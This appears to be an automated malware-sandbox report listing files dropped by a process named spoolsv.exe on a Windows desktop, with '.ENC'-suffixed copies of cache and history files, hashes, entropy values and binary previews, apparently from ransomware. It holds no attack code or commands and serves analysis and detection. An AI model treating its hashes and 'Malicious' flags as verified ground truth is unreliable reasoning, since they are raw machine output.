                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.9375
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wjBUxBaMU:YOU
                                                                                                                                                                                                                                                      MD5:245C0EA67C9B0A6C48BCB820876244D9
                                                                                                                                                                                                                                                      SHA1:CE94D80B0AC7CD7C1116DC32F7743F4C9B0DD53E
                                                                                                                                                                                                                                                      SHA-256:DC1B07C02B93667E63C8FBF67D76EEF45A17170D8A188A424D068DDEA5D22CF4
                                                                                                                                                                                                                                                      SHA-512:A75D68518CC93E4CF13CEFB501717319F4285E20F703D8007B9F95EFA630F8D3D985FC78EADE305F2A07D9C6C58FDD05E7C81C6C240F7BB1D4FE1ECF746512EE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..K6......-...$1....=7..Ioa...1

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:TosW/72eOQri:hW/7r/m
                                                                                                                                                                                                                                                      MD5:2DC7D177F5F9E493D15DFAF9D8562EBA
                                                                                                                                                                                                                                                      SHA1:C45661898ED23D14E95A94B78FAD6D6B541BAD14
                                                                                                                                                                                                                                                      SHA-256:89E7D23DE35D41E53E6C0FB2500E74925696BDA09BE83E17ED99CD4B5DEBFB7E
                                                                                                                                                                                                                                                      SHA-512:FF17FADD2A84F44A94FB259A27C6CC0BE325D3E4402F0712B2214B76818E77E0EE8C3E9B92099228C356C52F9285AF6AAB6794AA702BE30B9636C6FE4D0F0295
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:&.N....0.O.g.2.L....+u..!Fv..E.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with CR line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:RlqbgZQN7HQn:D+6Y7HQ
                                                                                                                                                                                                                                                      MD5:18E0DA69B26E71C65DA836898DECF55C
                                                                                                                                                                                                                                                      SHA1:8756F7A63163B5B8AE79E3F85E6D773D1E582E99
                                                                                                                                                                                                                                                      SHA-256:43C3D27398652C8398AE6AA6C9AFB139674C31A324AD9E579BC3320E07B810AF
                                                                                                                                                                                                                                                      SHA-512:26EA4E9A5B58166CDB906399C27C465F3EADAA916CC575D25AA6F1B79E0679DFD9A693FB21F2FF1057151ED53525B934727FB65142253061026C4F634AED2C3E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Y.fS..R...OGuh?r.k.V._s30...9Y

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.9375
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:HsQdaYXD:MuJz
                                                                                                                                                                                                                                                      MD5:2AE74BBD687EE05709510DF067A93BD2
                                                                                                                                                                                                                                                      SHA1:B6DF87F7A26C25CBA4B86431DE0B27A9499F56E5
                                                                                                                                                                                                                                                      SHA-256:275F5E859442FDA1F79B49FF0501B7B74199B4535D607A736BB856A05BFA1D5B
                                                                                                                                                                                                                                                      SHA-512:D16D2B00F443AFFF9C905A66D7FCD9C146133A82ACCD418D58066085BE02E5AA85EB2D508B96C7F4B9D786971802F6DA5A2482CFD87A2EB41DA20DFF924CA020
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:3.^...*:ub.Sk.....x.%..Y#~..}.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.788909765557392
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:EfgYsf7Q9ykn2Ald:ECDQQuJd
                                                                                                                                                                                                                                                      MD5:6C7A2EB04F35195DF241A1D5ED85EADC
                                                                                                                                                                                                                                                      SHA1:DEC4B5733DF44D6E007A2E80D48DBC1204ED2554
                                                                                                                                                                                                                                                      SHA-256:B23019ED3C97E0702F3F5C17F5B07C14C480B83F9D4BEBE83B2F46E3C570B110
                                                                                                                                                                                                                                                      SHA-512:EA729F49FB5EE7539CE0275521DC66A9061180478847082B9BE779A499B5A1CDD276E5F1F3EEA9DA275A7A1EB7226C2BD34ACDA4AEC7B16B1ACE1ABE2AE3076F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.j?x..._..n...!.........vY.2...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.9375
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:s6/Cl+ZAkL:s6/WmvL
                                                                                                                                                                                                                                                      MD5:99E86FB15F5C62A3878978D788E310D9
                                                                                                                                                                                                                                                      SHA1:86ED6A9671AF1B5EEBC546C457272C73D890CE6C
                                                                                                                                                                                                                                                      SHA-256:B8D826298DE58E7E1B0BE326F521768167F963A146DF8ABB0A6F665B2DD42F2C
                                                                                                                                                                                                                                                      SHA-512:D4844A1A69C72F3F5D29CBBD968787F89485F7F0438B27C5EB1F6E0C90ECF19E8964F4D4F76E3760A8DB96D07E84854A15741CD73D3686C762DFF1D981748396
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:_.......".'Z].d6..8B.....#l..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4194320
                                                                                                                                                                                                                                                      Entropy (8bit):7.999957759321146
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:98304:ILXdhdwOGEFkUHphHIe5v65zQq8fVq48UWlPmwn4KN9eWSp4h7GLg:YXdhdwzEXHsCq8fkjUWgw4s4WSp4hV
                                                                                                                                                                                                                                                      MD5:9DB093BB24845FD0CCFF0472D2BA2F79
                                                                                                                                                                                                                                                      SHA1:0CB7DF41BDDC9711D4818D5985AB25A9FDA38BB0
                                                                                                                                                                                                                                                      SHA-256:567B6954E70A7428360AB5B23E9DA9D2E7BD01182BB71B7F33A3028498AE99C6
                                                                                                                                                                                                                                                      SHA-512:E58D33B45C930B5E69DF02A2C625AB393C3B40D7393E9EF264101C903F5CA5B2797E80111BAFAD2855C30C58D730F2A63753B17E2CA379720B3850A8AFBD6D76
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:i^#e..<..7.-...P ....N....(.#.}.....h.1rt/.P..F.g.t...F%B..j.%..=^.C...=gxfK.h..?.........i..Y._..&..........X5q1...`......9.....5....ada...C.fA}gY6`......l3.}l..-......?....=.....d...-a.k>D..".U.t>s..+.D*.............P..@...0.u.w....q.t.......T...d.}I..?..TmB1.J.Ek..A..<..>.rISaq9W.I...IE..)<.v>.W.7B.)N.yo....yY.t...Y.i....8....h.."2U..Lq.R.A..I.w`..<%.......N"...$ ,.:.:.....S......z..\...Jk.).c.g~=p1......E.fFP...-.Y..er!.).h<....(......0...0.0@..A.x.....3.;..bSQ...8zt.b..).#........".;1|..|......v+..%.;.A)..!.^..~.})Q.....~......{1`'.....u...P...gd.......*}..6U..........h......4.....),~P...H;...m2Gc..Q.<.B.!n....}r6..M0.`.H..1.0..4.^....H..........J....9..'....op..2Y......'...9e.7S..._.V.I."r.]....}Z../i._v...G'....).C...C....=:..P..U.g......c..K^Lo.....1d0..Y......}..Q..'i.t..!.+...E .J...AS..|..t..k.F5...a5.g.k....^...v.....C.L.+m..../..!..a.A...g.....q...#T-...{^.......+8vK.O..%.:'....:0}......#...Y..........}.9.g..k

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_exif.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:5kY0+v7zy71:5kJ+K71
                                                                                                                                                                                                                                                      MD5:C7B996D3EC0FB2D2FEE5C5B875D0D051
                                                                                                                                                                                                                                                      SHA1:B1072E6D94531A98F06AF028CE4D27D0B2472DEE
                                                                                                                                                                                                                                                      SHA-256:E0E75457490C28931E55042C25B82DF4D15730A742F6492ADC2DC489AB79B185
                                                                                                                                                                                                                                                      SHA-512:8EC97D2830D466286667B5BFD77DB5B964C4BE9F9BD80B24CFCD0D847B4AC97B409F342B72D8306B4F5FA4D2BA149636D5B7B1973FA6246A464B698BCF4440A3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:!....=.G.U.`...r........8......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.9375
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wjBUxBaMU:YOU
                                                                                                                                                                                                                                                      MD5:245C0EA67C9B0A6C48BCB820876244D9
                                                                                                                                                                                                                                                      SHA1:CE94D80B0AC7CD7C1116DC32F7743F4C9B0DD53E
                                                                                                                                                                                                                                                      SHA-256:DC1B07C02B93667E63C8FBF67D76EEF45A17170D8A188A424D068DDEA5D22CF4
                                                                                                                                                                                                                                                      SHA-512:A75D68518CC93E4CF13CEFB501717319F4285E20F703D8007B9F95EFA630F8D3D985FC78EADE305F2A07D9C6C58FDD05E7C81C6C240F7BB1D4FE1ECF746512EE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..K6......-...$1....=7..Ioa...1

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:TosW/72eOQri:hW/7r/m
                                                                                                                                                                                                                                                      MD5:2DC7D177F5F9E493D15DFAF9D8562EBA
                                                                                                                                                                                                                                                      SHA1:C45661898ED23D14E95A94B78FAD6D6B541BAD14
                                                                                                                                                                                                                                                      SHA-256:89E7D23DE35D41E53E6C0FB2500E74925696BDA09BE83E17ED99CD4B5DEBFB7E
                                                                                                                                                                                                                                                      SHA-512:FF17FADD2A84F44A94FB259A27C6CC0BE325D3E4402F0712B2214B76818E77E0EE8C3E9B92099228C356C52F9285AF6AAB6794AA702BE30B9636C6FE4D0F0295
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:&.N....0.O.g.2.L....+u..!Fv..E.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012023100520231006\container.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\container.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Rdr[1].txt.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:R1H:nH
                                                                                                                                                                                                                                                      MD5:3964D6779423922AB1EA285C8FDF3475
                                                                                                                                                                                                                                                      SHA1:FC690E0F53BED1F86516D19B34CD06EC587CB559
                                                                                                                                                                                                                                                      SHA-256:8FCFB58B8FA2847E1DE3312040D5966654859C06F5D940B292A6967F750A2707
                                                                                                                                                                                                                                                      SHA-512:9BD8680D8DA96EF3EEF572AFFC86715D444C93BFBB11E2B874FB01B4F26E0A75E810998C5D2FCDB456DCB2A7F9BBC3ADE9050BD9C1AA0FB66CECF3E34ED9BA69
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.I.$i.eX:*..F"

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Rdr[1].txt.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:R1H:nH
                                                                                                                                                                                                                                                      MD5:3964D6779423922AB1EA285C8FDF3475
                                                                                                                                                                                                                                                      SHA1:FC690E0F53BED1F86516D19B34CD06EC587CB559
                                                                                                                                                                                                                                                      SHA-256:8FCFB58B8FA2847E1DE3312040D5966654859C06F5D940B292A6967F750A2707
                                                                                                                                                                                                                                                      SHA-512:9BD8680D8DA96EF3EEF572AFFC86715D444C93BFBB11E2B874FB01B4F26E0A75E810998C5D2FCDB456DCB2A7F9BBC3ADE9050BD9C1AA0FB66CECF3E34ED9BA69
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.I.$i.eX:*..F"

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE\container.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\WPNPRMRY.tmp.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db-shm.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

